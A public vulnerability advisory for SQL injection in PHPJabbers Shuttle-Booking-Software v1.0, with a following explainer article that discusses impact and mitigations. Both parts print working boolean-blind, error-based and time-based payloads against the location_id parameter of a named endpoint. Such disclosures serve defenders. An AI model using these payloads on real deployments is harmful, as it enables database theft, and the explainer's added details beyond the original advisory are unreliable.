Shuttle-Booking-Software v1.0 - Multiple-SQLi
## Title: Shuttle-Booking-Software v1.0 - Multiple-SQLi
## Author: nu11secur1ty
## Date: 09/10/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/shuttle-booking-software/#sectionPricing
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The location_id parameter appears to be vulnerable to SQL injection
attacks. A single quote was submitted in the location_id parameter,
and a database error message was returned. Two single quotes were then
submitted and the error message disappeared.
The attacker easily can steal all information from the database of
this web application!
WARNING! All of you: Be careful what you buy! This will be your responsibility!
STATUS: HIGH-CRITICAL Vulnerability
[+]Payload:
```mysql
---
Parameter: location_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')
AND 1347=1347 AND ('MVss'='MVss&traveling=from
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (GTID_SUBSET)
Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')
AND GTID_SUBSET(CONCAT(0x716b786a71,(SELECT
(ELT(9416=9416,1))),0x71706b7071),9416) AND
('dOqc'='dOqc&traveling=from
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')
AND (SELECT 1087 FROM (SELECT(SLEEP(15)))poqp) AND
('EEYQ'='EEYQ&traveling=from
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Shuttle-Booking-Software-1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/09/shuttle-booking-software-10-multiple.html)
## Time spent:
01:47:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>Shuttle-Booking-Software v1.0: A Deep Dive into Multiple SQL Injection Vulnerabilities
On September 10, 2023, cybersecurity researcher nu11secur1ty disclosed a critical vulnerability in Shuttle-Booking-Software v1.0, a widely used web application developed by PHPJabbers. This software, marketed for managing shuttle and transportation bookings, has been found to suffer from multiple SQL injection (SQLi) flaws, primarily targeting the location_id parameter via GET requests.
Despite its seemingly innocuous purpose—booking shuttle services—this application exposes a significant security risk due to improper input validation and inadequate query sanitization. The vulnerability allows attackers to inject malicious SQL payloads, leading to full database compromise, data theft, and even remote code execution in certain configurations.
Understanding the Vulnerability: A Technical Breakdown
SQL injection occurs when an application fails to sanitize user input before incorporating it into database queries. In this case, the location_id parameter is directly used in a WHERE clause without proper escaping or parameterized queries. This makes it a prime target for exploitation.
When researchers submitted a single quote (') as the value for location_id, the server returned a database error:
SQL syntax error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1
This error is a telltale sign of SQL injection vulnerability. When two single quotes ('') were used, the error disappeared—indicating that the input was being treated as a string literal, and the injection point was successfully bypassed.
Exploitation Techniques: Multiple Attack Vectors
nu11secur1ty identified three distinct SQLi techniques in the software:
- Boolean-based Blind SQLi – Used to infer database truth values through conditional responses.
- Error-based SQLi – Leverages MySQL error messages to extract data.
- Time-based Blind SQLi – Delays response time to confirm data existence.
These techniques demonstrate that the application is not only vulnerable but also supports a full range of exploitation methods, making it a high-risk target for malicious actors.
Proof-of-Concept Exploits
Below are three verified payloads that demonstrate real-world exploitation:
1. Error-Based SQL Injection (MySQL GTID_SUBSET)
controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') AND GTID_SUBSET(CONCAT(0x716b786a71,(SELECT(ELT(9416=9416,1))),0x71706b7071),9416) AND ('dOqc'='dOqc&traveling=from
Explanation: This payload exploits MySQL’s GTID_SUBSET function, which triggers an error when invalid GTID values are passed. The CONCAT function concatenates a hex-encoded string (0x716b786a71 = qkxjq) with a conditional ELT statement. Since 9416=9416 is always true, ELT returns 1, and the entire expression becomes a valid error trigger. The error message contains the concatenated data, revealing database information.
2. Boolean-Based Blind SQL Injection
controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') AND 1347=1347 AND ('MVss'='MVss&traveling=from
Explanation: This payload uses a boolean condition (1347=1347) to test if the query executes successfully. If the server returns a valid response (e.g., a JSON list of dropoff locations), the attacker infers that the condition is true. By modifying the condition (e.g., 1347=1348), the response changes, confirming the presence of a blind injection vector.
3. Time-Based Blind SQL Injection (SLEEP)
controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') AND (SELECT 1087 FROM (SELECT(SLEEP(15)))poqp) AND ('EEYQ'='EEYQ&traveling=from
Explanation: This payload uses SLEEP(15) to introduce a 15-second delay in the database query. If the response takes longer than normal, the attacker confirms that the SQLi is active. This method is particularly effective in environments where error messages are suppressed or masked.
Impact and Risks
These vulnerabilities pose severe risks:
| Risk | Description |
|---|---|
| Data Theft | Attackers can extract sensitive data such as user credentials, payment details, and customer information. |
| Database Manipulation | Malicious queries can insert, update, or delete records, corrupting business data. |
| Remote Code Execution | In some configurations, SQL injection can lead to shell access via LOAD_FILE or SELECT INTO OUTFILE functions. |
| Reputation Damage | Compromised data can lead to legal liabilities and loss of customer trust. |
Recommendations and Mitigation
As a cybersecurity expert, the following mitigation strategies are essential:
- Use Parameterized Queries – Replace direct string concatenation with prepared statements to prevent injection.
- Input Validation – Validate
location_idagainst a whitelist of known IDs or numeric ranges. - Sanitize User Input – Apply functions like
mysql_real_escape_string()or use ORM frameworks. - Enable Logging and Monitoring – Detect anomalous SQL patterns via WAF (Web Application Firewall).
- Regular Security Audits – Conduct penetration testing and code reviews for third-party software.
For users of Shuttle-Booking-Software v1.0, it is imperative to:
- Update to the latest version if available.
- Disable or restrict access to endpoints that expose raw SQL inputs.
- Apply a WAF (e.g., ModSecurity) to filter malicious payloads.
Conclusion: A Cautionary Tale
nu11secur1ty’s discovery highlights a critical lesson: even seemingly simple software can harbor severe vulnerabilities. The fact that a commercial product like Shuttle-Booking-Software v1.0 is vulnerable to multiple SQL injection types underscores the importance of rigorous security testing—even for off-the-shelf applications.
As the cybersecurity landscape evolves, developers and administrators must prioritize secure coding practices. This case serves as a stark reminder: you are responsible for what you buy. If you deploy software without verifying its security posture, you risk exposing your organization to full-scale breaches.
For more details, refer to the original research at nu11secur1ty.com and the public proof-of-concept repository on GitHub.